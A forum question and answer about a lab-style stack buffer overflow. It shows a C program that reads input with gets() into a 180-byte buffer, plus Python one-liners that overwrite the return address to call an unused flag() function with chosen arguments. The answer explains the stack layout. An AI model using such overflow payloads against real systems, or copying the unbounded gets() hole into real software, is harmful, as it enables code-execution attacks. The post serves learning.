I'm following this writeup on a buffer overflow of an array on the stack, doing a ROP attack to call a function that wouldn't normally be called.

There are three functions. vuln,flag and main.

main just calls vuln and vuln has a stackoverflow with 180 bytes.

int main()
{
  vuln();
}

void vuln()
{
  char buf[180];
  gets(buf);
}

flag is not called and has two parameters:

void flag(int param1, int param2) { }

It exists on address 0x080491e2.

flasg can be called by overflowing the buffer of 180 with 8 extra bytes and then add the address which EIP gets.

python -c "print('A'*188   '\xe2\x91\x04\x08')"

So far so good, flag is called but without parameters. To call flag with parameters we have to add 'A'*4 after flag's address and the two values of the integers with a '\r' between them.

python -c "print('A'*188   '\xe2\x91\x04\x08' 'A'*4 '\xef\xbe\xad\xde\r\xd0\xde\xc0')"

I dont understand why the 'A'*4 is needed, what stack parts is overwritten here? And also the '\r' between the arguments, if it's not there it's not working. What function does the '\r' have?

CodePudding user response：

The AAAA are because on entry to flag, it expects the top of the stack to contain its return address, with arguments starting 4 bytes past that. You don't care about flag being able to return, so you just need 4 bytes of garbage in place of the return address.

As for the \r, it isn't between the arguments (they should be adjacent in memory and there can't be any bytes between them); rather it is actually the first (least-significant) byte of the second argument. The ASCII carriage return \r has numerical value 0x0d, so your arguments are 0xdeadbeef, 0xc0ded00d. I don't know why they wrote the low byte as \r instead of \x0d which would have been more consistent. Maybe it was automatically translated from binary to hex escapes by some program.